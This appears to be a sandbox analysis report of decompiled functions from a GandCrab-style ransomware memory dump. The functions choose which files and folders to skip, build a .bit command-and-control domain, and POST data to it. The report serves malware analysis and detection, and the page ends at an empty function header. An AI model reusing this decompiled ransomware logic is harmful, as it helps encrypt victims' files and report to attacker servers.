Function 0FBB68F0 Relevance: 30.1, APIs: 11, Strings: 9, Instructions: 78
stringCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E0FBB68F0(WCHAR* __ecx) {
				int _t4;
				signed int _t5;
				signed int _t15;
				void* _t19;
				WCHAR* _t21;
				short* _t25;
				WCHAR* _t26;

				_t21 = __ecx;
				_t4 = lstrlenW(__ecx);
				_t5 = lstrlenW(_t21);
				_t1 = _t21 - 2; // -2
				_t25 = _t1 + _t5 * 2;
				_t19 = _t4 - 1;
				if(_t19 != 0) {
					do {
						_t25 = _t25 - 2;
						_t19 = _t19 - 1;
					} while ( *_t25 != 0x5c && _t19 != 0);
				}
				_t26 = _t25 + 2;
				if(lstrcmpiW(_t26, L"desktop.ini") != 0) {
					if(lstrcmpiW(_t26, L"autorun.inf") == 0 || lstrcmpiW(_t26, L"ntuser.dat") == 0 || lstrcmpiW(_t26, L"iconcache.db") == 0 || lstrcmpiW(_t26, L"bootsect.bak") == 0 || lstrcmpiW(_t26, L"boot.ini") == 0 || lstrcmpiW(_t26, L"ntuser.dat.log") == 0 || lstrcmpiW(_t26, L"thumbs.db") == 0) {
						goto L5;
					} else {
						_t15 = lstrcmpiW(_t26, L"CRAB-DECRYPT.txt");
						asm("sbb eax, eax");
						return  ~_t15 + 1;
					}
				} else {
					L5:
					return 1;
				}
			}

0x0fbb68f9
0x0fbb68fc
0x0fbb6901
0x0fbb6903
0x0fbb6906
0x0fbb6909
0x0fbb690a
0x0fbb6910
0x0fbb6910
0x0fbb6913
0x0fbb6914
0x0fbb6910
0x0fbb6924
0x0fbb6931
0x0fbb6946
0x00000000
0x0fbb6990
0x0fbb6996
0x0fbb699b
0x0fbb69a0
0x0fbb69a0
0x0fbb6935
0x0fbb6935
0x0fbb693b
0x0fbb693b

APIs

lstrlenW.KERNEL32(00000000,00000010,00000000,00000000,0FBB6B03), ref: 0FBB68FC
lstrlenW.KERNEL32(00000000), ref: 0FBB6901
lstrcmpiW.KERNEL32(-00000004,desktop.ini), ref: 0FBB692D
lstrcmpiW.KERNEL32(-00000004,autorun.inf), ref: 0FBB6942
lstrcmpiW.KERNEL32(-00000004,ntuser.dat), ref: 0FBB694E
lstrcmpiW.KERNEL32(-00000004,iconcache.db), ref: 0FBB695A
lstrcmpiW.KERNEL32(-00000004,bootsect.bak), ref: 0FBB6966
lstrcmpiW.KERNEL32(-00000004,boot.ini), ref: 0FBB6972
lstrcmpiW.KERNEL32(-00000004,ntuser.dat.log), ref: 0FBB697E
lstrcmpiW.KERNEL32(-00000004,thumbs.db), ref: 0FBB698A
lstrcmpiW.KERNEL32(-00000004,CRAB-DECRYPT.txt), ref: 0FBB6996

Strings

desktop.ini, xrefs: 0FBB6927
boot.ini, xrefs: 0FBB696C
ntuser.dat, xrefs: 0FBB6948
CRAB-DECRYPT.txt, xrefs: 0FBB6990
thumbs.db, xrefs: 0FBB6984
iconcache.db, xrefs: 0FBB6954
bootsect.bak, xrefs: 0FBB6960
ntuser.dat.log, xrefs: 0FBB6978
autorun.inf, xrefs: 0FBB693C

Memory Dump Source

Source File: 0000000B.00000002.320288020.000000000FBB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 0FBB0000, based on PE: true

Associated: 0000000B.00000002.320283406.000000000FBB0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.320296152.000000000FBBA000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.320303150.000000000FBC2000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.320307802.000000000FBC4000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_fbb0000_wzltxa.jbxd

Yara matches

Similarity

API ID: lstrcmpi$lstrlen
String ID: CRAB-DECRYPT.txt$autorun.inf$boot.ini$bootsect.bak$desktop.ini$iconcache.db$ntuser.dat$ntuser.dat.log$thumbs.db
API String ID: 203586893-3936223242
Opcode ID: d7b5665f533c2cfb38a4e36677939fd7dcd9c4ad1096bb63c78e30b7d9931445
Instruction ID: 6576a562e007e1e1f239c4b1185bea63addbd8a2eb72a6d1cc4ee8a8f20e08ca
Opcode Fuzzy Hash: d7b5665f533c2cfb38a4e36677939fd7dcd9c4ad1096bb63c78e30b7d9931445
Instruction Fuzzy Hash: C1119A62680627755A2026BDFC01EFF138ECED5A9038502EDE940E3017EBD5EA028DB5

Uniqueness

Uniqueness Score: -1.00%

Function 0FBB6780 Relevance: 28.1, APIs: 7, Strings: 9, Instructions: 124
memoryCOMMON

Download Yara Rule

C-Code - Quality: 19%

			E0FBB6780(void* __ecx) {
				void* _t12;
				intOrPtr* _t23;
				void* _t51;
				void* _t52;

				_t52 = __ecx;
				_t51 = VirtualAlloc(0, 0x201, 0x3000, 0x40);
				if(E0FBB81F0(_t52, L"\\ProgramData\\") != 0 || E0FBB81F0(_t52, L"\\IETldCache\\") != 0 || E0FBB81F0(_t52, L"\\Boot\\") != 0 || E0FBB81F0(_t52, L"\\Program Files\\") != 0 || E0FBB81F0(_t52, L"\\Tor Browser\\") != 0 || E0FBB81F0(_t52, L"Ransomware") != 0 || E0FBB81F0(_t52, L"\\All Users\\") != 0 || E0FBB81F0(_t52, L"\\Local Settings\\") != 0) {
					L18:
					VirtualFree(_t51, 0, 0x8000);
					return 0;
				} else {
					_t12 = E0FBB81F0(_t52, L"\\Windows\\");
					if(_t12 != 0) {
						goto L18;
					} else {
						_t23 = __imp__SHGetSpecialFolderPathW;
						_push(_t12);
						_push(0x2a);
						_push(_t51);
						_push(_t12);
						if( *_t23() == 0 || E0FBB81F0(_t52, _t51) == 0) {
							_push(0);
							_push(0x2b);
							_push(_t51);
							_push(0);
							if( *_t23() == 0 || E0FBB81F0(_t52, _t51) == 0) {
								_push(0);
								_push(0x24);
								_push(_t51);
								_push(0);
								if( *_t23() == 0 || E0FBB81F0(_t52, _t51) == 0) {
									_push(0);
									_push(0x1c);
									_push(_t51);
									_push(0);
									if( *_t23() == 0 || E0FBB81F0(_t52, _t51) == 0) {
										VirtualFree(_t51, 0, 0x8000);
										return 1;
									} else {
										goto L18;
									}
								} else {
									goto L18;
								}
							} else {
								goto L18;
							}
						} else {
							goto L18;
						}
					}
				}
			}

0x0fbb6791
0x0fbb67a0
0x0fbb67a9
0x0fbb68d4
0x0fbb68dd
0x0fbb68e8
0x0fbb683b
0x0fbb6842
0x0fbb6849
0x00000000
0x0fbb684f
0x0fbb684f
0x0fbb6855
0x0fbb6856
0x0fbb6858
0x0fbb6859
0x0fbb685e
0x0fbb686d
0x0fbb686f
0x0fbb6871
0x0fbb6872
0x0fbb6878
0x0fbb6887
0x0fbb6889
0x0fbb688b
0x0fbb688c
0x0fbb6892
0x0fbb68a1
0x0fbb68a3
0x0fbb68a5
0x0fbb68a6
0x0fbb68ac
0x0fbb68c8
0x0fbb68d3
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0fbb685e
0x0fbb6849

APIs

VirtualAlloc.KERNEL32(00000000,00000201,00003000,00000040,00000000,?,?,0FBB6E06,00000000,?,?), ref: 0FBB6793
SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000002A,00000000,?,?,0FBB6E06,00000000,?,?), ref: 0FBB685A
SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000002B,00000000,?,?,0FBB6E06,00000000,?,?), ref: 0FBB6874
SHGetSpecialFolderPathW.SHELL32(00000000,00000000,00000024,00000000,?,?,0FBB6E06,00000000,?,?), ref: 0FBB688E
SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000001C,00000000,?,?,0FBB6E06,00000000,?,?), ref: 0FBB68A8
VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,0FBB6E06,00000000,?,?), ref: 0FBB68C8
VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,0FBB6E06,00000000,?,?), ref: 0FBB68DD

Strings

\IETldCache\, xrefs: 0FBB67AF
\Program Files\, xrefs: 0FBB67D7
\Windows\, xrefs: 0FBB683B
\ProgramData\, xrefs: 0FBB6799
\Boot\, xrefs: 0FBB67C3
Ransomware, xrefs: 0FBB67FF
\Local Settings\, xrefs: 0FBB6827
\Tor Browser\, xrefs: 0FBB67EB
\All Users\, xrefs: 0FBB6813

Memory Dump Source

Source File: 0000000B.00000002.320288020.000000000FBB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 0FBB0000, based on PE: true

Associated: 0000000B.00000002.320283406.000000000FBB0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.320296152.000000000FBBA000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.320303150.000000000FBC2000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.320307802.000000000FBC4000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_fbb0000_wzltxa.jbxd

Yara matches

Similarity

API ID: FolderPathSpecial$Virtual$Free$Alloc
String ID: Ransomware$\All Users\$\Boot\$\IETldCache\$\Local Settings\$\Program Files\$\ProgramData\$\Tor Browser\$\Windows\
API String ID: 1363212851-3735464813
Opcode ID: 1fb3374da3169ecb4a33aef8ad2a25d8de082f9fbcc75af7cf98fb019e3bc3b5
Instruction ID: 12a89847242ca74bccf5138d445667158c53a2d58b0ab8148393a27209ca8ecc
Opcode Fuzzy Hash: 1fb3374da3169ecb4a33aef8ad2a25d8de082f9fbcc75af7cf98fb019e3bc3b5
Instruction Fuzzy Hash: BC310F2274176122E92022663D15BFF414FCBC9A45F5040EEAA05EE2C2EFD8DC038FA9

Uniqueness

Uniqueness Score: -1.00%

Function 0FBB5220 Relevance: 24.6, APIs: 8, Strings: 6, Instructions: 91
memorystringsleepCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E0FBB5220() {
				WCHAR* _v8;
				intOrPtr _v12;
				char _v16;
				intOrPtr _v20;
				char _v24;
				char* _v28;
				char* _v32;
				char* _v36;
				short _v40;
				char _v56;
				short _v60;
				intOrPtr _v64;
				char _v80;
				WCHAR* _t26;
				intOrPtr _t27;
				long _t32;
				WCHAR* _t37;
				void* _t39;
				signed int _t40;
				signed int _t41;
				signed int _t45;
				void* _t48;
				WCHAR* _t49;
				void* _t52;
				void* _t53;

				asm("movdqa xmm0, [0xfbc0540]");
				_v36 =  &_v56;
				asm("movdqu [ebp-0x34], xmm0");
				_v32 =  &_v80;
				asm("movdqa xmm0, [0xfbc0520]");
				_v40 = 0x74;
				asm("movdqu [ebp-0x4c], xmm0");
				_v64 = 0x69622e6d;
				_v60 = 0x74;
				_v24 = 0x62636467;
				_v20 = 0x7469622e;
				_v16 = 0;
				_v28 =  &_v24;
				_t26 = VirtualAlloc(0, 0x100, 0x3000, 4);
				_t37 = _t26;
				_v8 = _t37;
				if(_t37 != 0) {
					_t40 = 0;
					_t48 = 1;
					_t45 = 0;
					while(1) {
						_t27 =  *((intOrPtr*)(_t52 + _t45 * 4 - 0x20));
						_t45 = _t45 + 1;
						_v12 = _t27;
						if(_t45 == 3) {
							asm("sbb esi, esi");
							_t48 =  ~(_t48 - 1) + 2;
							_t45 = 0;
						}
						if(_t40 == 0xffffffff) {
							Sleep(0x3e8);
						}
						_t39 = VirtualAlloc(0, 2 + lstrlenW(_t37) * 2, 0x3000, 4);
						_t41 = _t39;
						E0FBB5060(_t41, _v12, _t48);
						_t53 = _t53 + 4;
						_t32 = lstrcmpiA(_t39, "fabian wosar <3");
						if(_t32 != 0) {
							break;
						}
						VirtualFree(_t39, _t32, 0x8000);
						_t37 = _v8;
						_t40 = _t41 | 0xffffffff;
					}
					_t49 = _v8;
					wsprintfW(_t49, L"%S", _t39);
					VirtualFree(_t39, 0, 0x8000);
					_t26 = _t49;
				}
				return _t26;
			}

0x0fbb5226
0x0fbb5236
0x0fbb5241
0x0fbb5246
0x0fbb524c
0x0fbb525b
0x0fbb5261
0x0fbb5266
0x0fbb526d
0x0fbb5273
0x0fbb527a
0x0fbb5281
0x0fbb5285
0x0fbb5288
0x0fbb528e
0x0fbb5290
0x0fbb5295
0x0fbb529b
0x0fbb529d
0x0fbb52a2
0x0fbb52a4
0x0fbb52a4
0x0fbb52a8
0x0fbb52a9
0x0fbb52af
0x0fbb52b4
0x0fbb52b6
0x0fbb52b9
0x0fbb52b9
0x0fbb52be
0x0fbb52c5
0x0fbb52c5
0x0fbb52ec
0x0fbb52ef
0x0fbb52f1
0x0fbb52f6
0x0fbb52ff
0x0fbb5307
0x00000000
0x00000000
0x0fbb5310
0x0fbb5316
0x0fbb5319
0x0fbb5319
0x0fbb531e
0x0fbb5328
0x0fbb5339
0x0fbb533f
0x0fbb533f
0x0fbb5347

APIs

VirtualAlloc.KERNEL32(00000000,00000100,00003000,00000004,00000000,00000000,00000000), ref: 0FBB5288
Sleep.KERNEL32(000003E8), ref: 0FBB52C5
lstrlenW.KERNEL32(00000000,00003000,00000004), ref: 0FBB52D3
VirtualAlloc.KERNEL32(00000000,00000000), ref: 0FBB52E3
lstrcmpiA.KERNEL32(00000000,fabian wosar <3), ref: 0FBB52FF
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0FBB5310
wsprintfW.USER32 ref: 0FBB5328
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0FBB5339

Strings

.bit, xrefs: 0FBB527A
t, xrefs: 0FBB526D
m.bi, xrefs: 0FBB5266
fabian wosar <3, xrefs: 0FBB52F9
t, xrefs: 0FBB525B
gdcb, xrefs: 0FBB5273

Memory Dump Source

Source File: 0000000B.00000002.320288020.000000000FBB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 0FBB0000, based on PE: true

Associated: 0000000B.00000002.320283406.000000000FBB0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.320296152.000000000FBBA000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.320303150.000000000FBC2000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.320307802.000000000FBC4000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_fbb0000_wzltxa.jbxd

Yara matches

Similarity

API ID: Virtual$AllocFree$Sleeplstrcmpilstrlenwsprintf
String ID: .bit$fabian wosar <3$gdcb$m.bi$t$t
API String ID: 2709691373-2847225850
Opcode ID: 005bfdac74660a822d7ac29ea91ab447d59c2031eef9fe0d8f59d211d7a6b3e6
Instruction ID: 024b3510ab1c8e783e277d8e7fd3a9fef89ce46bd0db71b923bd727edd558b31
Opcode Fuzzy Hash: 005bfdac74660a822d7ac29ea91ab447d59c2031eef9fe0d8f59d211d7a6b3e6
Instruction Fuzzy Hash: A031D471E00309ABDB10DFA5ED86BEEBB78EF48311F100159FA05B7281D6F45A018F91

Uniqueness

Uniqueness Score: -1.00%

Function 0FBB54F0 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 117
stringmemorynetworkCOMMON

Download Yara Rule

C-Code - Quality: 22%

			E0FBB54F0(CHAR* __ecx, CHAR** __edx, intOrPtr _a8) {
				void* _v8;
				CHAR* _v12;
				void* _v16;
				CHAR** _v20;
				void* _v24;
				char _v28;
				short _v124;
				void* _t40;
				CHAR* _t44;
				CHAR* _t46;
				void* _t47;
				void* _t55;
				void* _t56;
				CHAR* _t58;
				void* _t59;

				_t46 = __ecx;
				_v20 = __edx;
				_v12 = __ecx;
				E0FBB7E40( &_v28);
				_v16 = E0FBB5220();
				_t55 = 0x400 + lstrlenA(_t46) * 2;
				_t7 = _t55 + 1; // 0x1
				_t47 = VirtualAlloc(0, _t7, 0x3000, 0x40);
				_v8 = VirtualAlloc(0, 0x32001, 0x3000, 0x40);
				if(_t47 == 0) {
					L3:
					_t58 = 0;
					L4:
					lstrcatA(_t58, _v12);
					asm("movdqu xmm0, [0xfbbfb40]");
					asm("movdqu [ebp-0x78], xmm0");
					asm("movdqu xmm0, [0xfbbfb50]");
					asm("movdqu [ebp-0x68], xmm0");
					asm("movdqu xmm0, [0xfbbfb60]");
					asm("movdqu [ebp-0x58], xmm0");
					asm("movdqu xmm0, [0xfbbfb70]");
					asm("movdqu [ebp-0x48], xmm0");
					asm("movdqu xmm0, [0xfbbfb80]");
					asm("movdqu [ebp-0x38], xmm0");
					asm("movdqu xmm0, [0xfbbfb90]");
					asm("movdqu [ebp-0x28], xmm0");
					lstrlenA(_t58);
					_t56 = 0;
					_push(lstrlenW( &_v124));
					_push( &_v124);
					_push(L"POST");
					_push(0x31fff);
					_push(_v8);
					_push(lstrlenA(_t58));
					_push(_t58);
					_t59 = _v16;
					_push(L"popkadurak");
					_push(_t59);
					if(E0FBB8050( &_v28) != 0) {
						_t56 = 1;
						if(_a8 != 0) {
							_v12 = 0;
							if(E0FBB53D0(_v8,  &_v12) == 0) {
								_t56 = 0;
							} else {
								_t44 = _v12;
								if(_t44 != 0) {
									 *_v20 = _t44;
								}
							}
						}
					}
					VirtualFree(_t59, 0, 0x8000);
					VirtualFree(_v8, 0, 0x8000);
					VirtualFree(_t47, 0, 0x8000);
					_t40 = _v24;
					if(_t40 != 0) {
						InternetCloseHandle(_t40);
					}
					return _t56;
				}
				_t9 = _t55 + 1; // 0x1
				if(_t55 >= _t9) {
					goto L3;
				} else {
					_t58 = _t47;
					goto L4;
				}
			}

0x0fbb54f8
0x0fbb54fa
0x0fbb5501
0x0fbb5504
0x0fbb550f
0x0fbb5525
0x0fbb552c
0x0fbb5542
0x0fbb5546
0x0fbb554b
0x0fbb5558
0x0fbb5558
0x0fbb555a
0x0fbb555e
0x0fbb5564
0x0fbb556d
0x0fbb5572
0x0fbb557a
0x0fbb557f
0x0fbb5587
0x0fbb558c
0x0fbb5594
0x0fbb5599
0x0fbb55a1
0x0fbb55a6
0x0fbb55ae
0x0fbb55b3
0x0fbb55bc
0x0fbb55c5
0x0fbb55c9
0x0fbb55ca
0x0fbb55d2
0x0fbb55d7
0x0fbb55e1
0x0fbb55e2
0x0fbb55e3
0x0fbb55e9
0x0fbb55ee
0x0fbb55f6
0x0fbb55fc
0x0fbb5601
0x0fbb5609
0x0fbb5617
0x0fbb5627
0x0fbb5619
0x0fbb5619
0x0fbb561e
0x0fbb5623
0x0fbb5623
0x0fbb561e
0x0fbb5617
0x0fbb5601
0x0fbb5637
0x0fbb5643
0x0fbb564d
0x0fbb564f
0x0fbb5654
0x0fbb5657
0x0fbb5657
0x0fbb5665
0x0fbb5665
0x0fbb554d
0x0fbb5552
0x00000000
0x0fbb5554
0x0fbb5554
0x00000000
0x0fbb5554

APIs

Part of subcall function 0FBB7E40: InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 0FBB8024
Part of subcall function 0FBB7E40: InternetOpenW.WININET(006F004D,00000001,00000000,00000000,10000000), ref: 0FBB803D

Part of subcall function 0FBB5220: VirtualAlloc.KERNEL32(00000000,00000100,00003000,00000004,00000000,00000000,00000000), ref: 0FBB5288
Part of subcall function 0FBB5220: Sleep.KERNEL32(000003E8), ref: 0FBB52C5
Part of subcall function 0FBB5220: lstrlenW.KERNEL32(00000000,00003000,00000004), ref: 0FBB52D3
Part of subcall function 0FBB5220: VirtualAlloc.KERNEL32(00000000,00000000), ref: 0FBB52E3
Part of subcall function 0FBB5220: lstrcmpiA.KERNEL32(00000000,fabian wosar <3), ref: 0FBB52FF
Part of subcall function 0FBB5220: VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0FBB5310
Part of subcall function 0FBB5220: wsprintfW.USER32 ref: 0FBB5328
Part of subcall function 0FBB5220: VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0FBB5339

lstrlenA.KERNEL32(00000000,00000000,00000000,74CB6980), ref: 0FBB5512
VirtualAlloc.KERNEL32(00000000,00000001,00003000,00000040), ref: 0FBB5532
VirtualAlloc.KERNEL32(00000000,00032001,00003000,00000040), ref: 0FBB5544
lstrcatA.KERNEL32(00000000,?), ref: 0FBB555E
lstrlenA.KERNEL32(00000000), ref: 0FBB55B3
lstrlenW.KERNEL32(?), ref: 0FBB55BF
lstrlenA.KERNEL32(00000000,00000000,00031FFF,?,00000000), ref: 0FBB55DB
VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,popkadurak,00000000,00000000,?,00000000), ref: 0FBB5637
VirtualFree.KERNEL32(00000000,00000000,00008000,?,00000000), ref: 0FBB5643
VirtualFree.KERNEL32(00000000,00000000,00008000,?,00000000), ref: 0FBB564D
InternetCloseHandle.WININET(0FBB581B), ref: 0FBB5657

Strings

popkadurak, xrefs: 0FBB55E9
POST, xrefs: 0FBB55CA

Memory Dump Source

Source File: 0000000B.00000002.320288020.000000000FBB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 0FBB0000, based on PE: true

Associated: 0000000B.00000002.320283406.000000000FBB0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.320296152.000000000FBBA000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.320303150.000000000FBC2000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.320307802.000000000FBC4000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_fbb0000_wzltxa.jbxd

Yara matches

Similarity

API ID: Virtual$Freelstrlen$Alloc$Internet$Open$CloseHandleSleeplstrcatlstrcmpiwsprintf
String ID: POST$popkadurak
API String ID: 2554059081-2707760125
Opcode ID: 498d7a1b3aca2973170ffb8533a6e9041d9a34666d79ade018a3683076b37b84
Instruction ID: 1d33b07785619a98dfeeea944932fbaf3f164e993423e68cbd7307418ba7d7a4
Opcode Fuzzy Hash: 498d7a1b3aca2973170ffb8533a6e9041d9a34666d79ade018a3683076b37b84
Instruction Fuzzy Hash: F541B375D00309A6EB209BA9EC51FFD7B7CEB88711F140159EA40B3181EBF86645CF90

Uniqueness

Uniqueness Score: -1.00%

Function 0FBB72A0 Relevance: 20.1, APIs: 16, Instructions: 120
stringCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E0FBB72A0(intOrPtr* __ecx) {
				int _t42;
				int _t48;
				int _t51;
				int _t54;
				int _t57;
				int _t60;
				int _t63;
				int _t66;
				int _t70;
				int _t72;
				void* _t75;
				intOrPtr* _t86;
				int _t88;
				int _t89;
				int _t90;
				int _t91;
				int _t92;
				int _t93;
				int _t94;
				void* _t95;

				_t40 = lstrlenW;
				_t86 = __ecx;
				_t75 = 0;
				if( *__ecx != 0) {
					_t72 = lstrlenW( *(__ecx + 8));
					_t3 = lstrlenW( *(_t86 + 4)) + 4; // 0x4
					_t40 = lstrlenW;
					_t75 = _t3 + _t72;
				}
				if( *((intOrPtr*)(_t86 + 0xc)) != 0) {
					_t95 =  *_t40( *((intOrPtr*)(_t86 + 0x14)));
					_t70 = lstrlenW( *(_t86 + 0x10));
					_t7 = _t95 + 4; // 0x4
					_t75 = _t7 + _t70 + _t75;
				}
				if( *((intOrPtr*)(_t86 + 0x18)) != 0) {
					_t94 = lstrlenW( *(_t86 + 0x20));
					_t66 = lstrlenW( *(_t86 + 0x1c));
					_t11 = _t94 + 4; // 0x4
					_t75 = _t11 + _t66 + _t75;
				}
				if( *((intOrPtr*)(_t86 + 0x24)) != 0) {
					_t93 = lstrlenW( *(_t86 + 0x2c));
					_t63 = lstrlenW( *(_t86 + 0x28));
					_t15 = _t93 + 4; // 0x4
					_t75 = _t15 + _t63 + _t75;
				}
				if( *((intOrPtr*)(_t86 + 0x30)) != 0) {
					_t92 = lstrlenW( *(_t86 + 0x38));
					_t60 = lstrlenW( *(_t86 + 0x34));
					_t19 = _t92 + 4; // 0x4
					_t75 = _t19 + _t60 + _t75;
				}
				if( *((intOrPtr*)(_t86 + 0x3c)) != 0) {
					_t91 = lstrlenW( *(_t86 + 0x44));
					_t57 = lstrlenW( *(_t86 + 0x40));
					_t23 = _t91 + 4; // 0x4
					_t75 = _t23 + _t57 + _t75;
				}
				if( *((intOrPtr*)(_t86 + 0x48)) != 0) {
					_t90 = lstrlenW( *(_t86 + 0x50));
					_t54 = lstrlenW( *(_t86 + 0x4c));
					_t27 = _t90 + 4; // 0x4
					_t75 = _t27 + _t54 + _t75;
				}
				if( *((intOrPtr*)(_t86 + 0x54)) != 0) {
					_t89 = lstrlenW( *(_t86 + 0x5c));
					_t51 = lstrlenW( *(_t86 + 0x58));
					_t31 = _t89 + 4; // 0x4
					_t75 = _t31 + _t51 + _t75;
				}
				if( *((intOrPtr*)(_t86 + 0x60)) != 0) {
					_t75 = _t75 + 0x14;
				}
				if( *((intOrPtr*)(_t86 + 0x74)) != 0) {
					_t88 = lstrlenW( *(_t86 + 0x7c));
					_t48 = lstrlenW( *(_t86 + 0x78));
					_t36 = _t88 + 4; // 0x4
					_t75 = _t36 + _t48 + _t75;
				}
				if( *((intOrPtr*)(_t86 + 0x80)) == 0) {
					return _t75;
				} else {
					_t42 = lstrlenW( *(_t86 + 0x88));
					return lstrlenW( *(_t86 + 0x84)) + 4 + _t75 + _t42;
				}
			}

0x0fbb72a0
0x0fbb72a8
0x0fbb72aa
0x0fbb72ae
0x0fbb72b3
0x0fbb72c1
0x0fbb72c4
0x0fbb72c9
0x0fbb72c9
0x0fbb72cf
0x0fbb72d9
0x0fbb72e0
0x0fbb72e4
0x0fbb72e7
0x0fbb72e7
0x0fbb72ed
0x0fbb72fb
0x0fbb72fd
0x0fbb7305
0x0fbb7308
0x0fbb7308
0x0fbb730e
0x0fbb731c
0x0fbb731e
0x0fbb7326
0x0fbb7329
0x0fbb7329
0x0fbb732f
0x0fbb733d
0x0fbb733f
0x0fbb7347
0x0fbb734a
0x0fbb734a
0x0fbb7350
0x0fbb735e
0x0fbb7360
0x0fbb7368
0x0fbb736b
0x0fbb736b
0x0fbb7371
0x0fbb737f
0x0fbb7381
0x0fbb7389
0x0fbb738c
0x0fbb738c
0x0fbb7392
0x0fbb73a0
0x0fbb73a2
0x0fbb73aa
0x0fbb73ad
0x0fbb73ad
0x0fbb73b3
0x0fbb73b5
0x0fbb73b5
0x0fbb73bc
0x0fbb73ca
0x0fbb73cc
0x0fbb73d4
0x0fbb73d7
0x0fbb73d7
0x0fbb73e0
0x0fbb740c
0x0fbb73e2
0x0fbb73e8
0x0fbb7406
0x0fbb7406

APIs

lstrlenW.KERNEL32(?,?,?,?,0FBB4819,00000000,?,00000000,00000000,?,00000000), ref: 0FBB72F2
lstrlenW.KERNEL32(?,?,?,?,0FBB4819,00000000,?,00000000,00000000,?,00000000), ref: 0FBB72FD
lstrlenW.KERNEL32(?,?,?,?,0FBB4819,00000000,?,00000000,00000000,?,00000000), ref: 0FBB7313
lstrlenW.KERNEL32(?,?,?,?,0FBB4819,00000000,?,00000000,00000000,?,00000000), ref: 0FBB731E
lstrlenW.KERNEL32(?,?,?,?,0FBB4819,00000000,?,00000000,00000000,?,00000000), ref: 0FBB7334
lstrlenW.KERNEL32(?,?,?,?,0FBB4819,00000000,?,00000000,00000000,?,00000000), ref: 0FBB733F
lstrlenW.KERNEL32(?,?,?,?,0FBB4819,00000000,?,00000000,00000000,?,00000000), ref: 0FBB7355
lstrlenW.KERNEL32(0FBB4B36,?,?,?,0FBB4819,00000000,?,00000000,00000000,?,00000000), ref: 0FBB7360
lstrlenW.KERNEL32(?,?,?,?,0FBB4819,00000000,?,00000000,00000000,?,00000000), ref: 0FBB7376
lstrlenW.KERNEL32(?,?,?,?,0FBB4819,00000000,?,00000000,00000000,?,00000000), ref: 0FBB7381
lstrlenW.KERNEL32(?,?,?,?,0FBB4819,00000000,?,00000000,00000000,?,00000000), ref: 0FBB7397
lstrlenW.KERNEL32(?,?,?,?,0FBB4819,00000000,?,00000000,00000000,?,00000000), ref: 0FBB73A2
lstrlenW.KERNEL32(?,?,?,?,0FBB4819,00000000,?,00000000,00000000,?,00000000), ref: 0FBB73C1
lstrlenW.KERNEL32(?,?,?,?,0FBB4819,00000000,?,00000000,00000000,?,00000000), ref: 0FBB73CC
lstrlenW.KERNEL32(?,?,?,?,0FBB4819,00000000,?,00000000,00000000,?,00000000), ref: 0FBB73E8
lstrlenW.KERNEL32(?,?,?,?,0FBB4819,00000000,?,00000000,00000000,?,00000000), ref: 0FBB73F6

Memory Dump Source

Source File: 0000000B.00000002.320288020.000000000FBB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 0FBB0000, based on PE: true

Associated: 0000000B.00000002.320283406.000000000FBB0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.320296152.000000000FBBA000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.320303150.000000000FBC2000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 0000000B.00000002.320307802.000000000FBC4000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_fbb0000_wzltxa.jbxd

Yara matches

Similarity

API ID: lstrlen
String ID:
API String ID: 1659193697-0
Opcode ID: eeb4ba310261e5107be08dfd79974ec14166adf4a955cd5f2db3d0c126e69d8d
Instruction ID: d091b7d9ab33f203b1852c5c5adac06e7df6961bc4553ac0956f4d4c05e1995b
Opcode Fuzzy Hash: eeb4ba310261e5107be08dfd79974ec14166adf4a955cd5f2db3d0c126e69d8d
Instruction Fuzzy Hash: 43413D32500612FFC7125FA9EDC8798B7A6FF04326F884538E80283A61D7B5A479DF80

Uniqueness

Uniqueness Score: -1.00%

Function 0FBB5F00 Relevance: 19.3, APIs: 8, Strings: 3, Instructions: 66
stringmemorylibraryCOMMON

Download Yara Rule

C-Code - Quality: 88%

